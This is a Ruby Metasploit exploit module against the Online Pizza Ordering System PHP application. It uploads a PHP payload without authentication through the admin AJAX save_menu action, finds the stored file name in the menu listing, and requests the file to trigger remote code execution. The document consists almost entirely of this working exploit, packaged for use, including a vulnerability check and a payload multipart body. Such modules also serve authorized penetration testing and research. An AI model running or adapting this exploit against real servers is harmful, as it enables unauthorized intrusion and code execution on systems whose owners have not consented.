##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
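class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata. Only TARGETURI is configurable; everything else about the
  # upload (the save_menu action, the form field names, the assets/img path
  # the file is served from) is fixed by the target application.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Online Pizza Ordering System PHP File Upload Vulnerability",
        'Description' => %q{
This module exploits a vulnerability found in Online Pizza Ordering System By abusing the
admin_class.php file, a malicious user can upload a file to the img/ directory
without any authentication, which results in arbitrary code execution. The module
has been tested successfully on Ubuntu 22.04.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Sefa Ozan' # author & msf module
        ],
        'References' => [
          ['URL', 'https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [
          ['Online Pizza Ordering System', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2023-09-11',
        'DefaultTarget' => 0,
        # The payload is written to the web root as a .php file and the menu
        # row created to carry it is never removed, so both stay behind.
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Online Pizza Ordering System', '/php-opos'])
      ]
    )
  end

  # Probe for the admin AJAX endpoint the upload goes through.
  #
  # A 200 only shows that admin/ajax.php exists, not that the save_menu action
  # is reachable without authentication, so the strongest verdict is Appears.
  # No response at all means we could not tell, not that the host is safe.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php')
    )

    return Exploit::CheckCode::Unknown unless res
    return Exploit::CheckCode::Safe unless res.code == 200

    Exploit::CheckCode::Appears
  end

  # Upload the PHP payload as a menu image via ajax.php?action=save_menu,
  # recover the name the application stored it under from the menu listing,
  # then request it from assets/img/ to trigger execution.
  #
  # Every step aborts with fail_with instead of carrying a nil forward: the
  # original flow would either raise on a failed regex match or request
  # assets/img/ with an empty file name.
  def exploit
    payload_name = "#{rand_text_alpha(rand(5..14))}.php"
    # Random marker stored as both the menu name and description so the row we
    # create can be found again in the listing. It is hex only, so it can be
    # interpolated into the regex below without escaping.
    marker = Rex::Text.rand_text_hex(7)

    # Rex::MIME::Message produces a well-formed multipart body and its own
    # boundary, replacing the hand-rolled delimiter strings. Field names,
    # values and the lack of a Content-Type on the file part mirror the
    # request the application expects.
    form = Rex::MIME::Message.new
    form.add_part('', nil, nil, 'form-data; name="id"')
    form.add_part(marker, nil, nil, 'form-data; name="name"')
    form.add_part(marker, nil, nil, 'form-data; name="description"')
    form.add_part('on', nil, nil, 'form-data; name="status"')
    form.add_part('3', nil, nil, 'form-data; name="category_id"')
    form.add_part('1', nil, nil, 'form-data; name="price"')
    form.add_part(
      "<?php #{payload.encoded} ?>",
      nil,
      nil,
      "form-data; name=\"img\"; filename=\"#{payload_name}\""
    )

    print_status("Sending PHP payload (#{payload_name})")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
      'vars_get' => { 'action' => 'save_menu' },
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'data' => form.to_s
    )

    fail_with(Failure::Unreachable, 'No response from the target while uploading the payload') unless res
    # save_menu is assumed to answer with "1" on success (this is the only
    # success signal the module has); anything else is treated as a failed
    # upload. The check is deliberately loose, so a verbose error page that
    # happens to contain a "1" would also pass it.
    unless res.code == 200 && res.body.include?('1')
      fail_with(Failure::UnexpectedReply, "File wasn't uploaded, aborting!")
    end

    # The application may store the image under a different name than the
    # one we supplied, so read the stored path back from the menu listing.
    # This listing is fetched without any session, exactly as the upload was;
    # if the listing turns out to require authentication this step will fail.
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
      'vars_get' => { 'page' => 'menu' }
    )

    fail_with(Failure::Unreachable, 'No response from the target while fetching the menu listing') unless res
    unless res.body.include?(payload_name)
      fail_with(Failure::NotFound, "Could not find #{payload_name} in the menu listing")
    end

    # Locate the row we created by its marker name/description and the fixed
    # status/price/category values sent above, then capture data-img_path.
    # payload_name contains a '.', hence Regexp.escape; the capture is bounded
    # to the attribute value so it cannot run into neighbouring markup.
    row = res.body.match(
      /data-name="#{marker}" data-status="1" data-description="#{marker}" data-price="1" data-category_id="3" data-img_path="([^"]*?#{Regexp.escape(payload_name)})">Edit</
    )
    fail_with(Failure::NotFound, "Menu listing did not expose the stored path for #{payload_name}") unless row
    img_path = row[1]

    print_status("Executing PHP payload (#{img_path})")
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'assets', 'img', img_path)
    )
  end
end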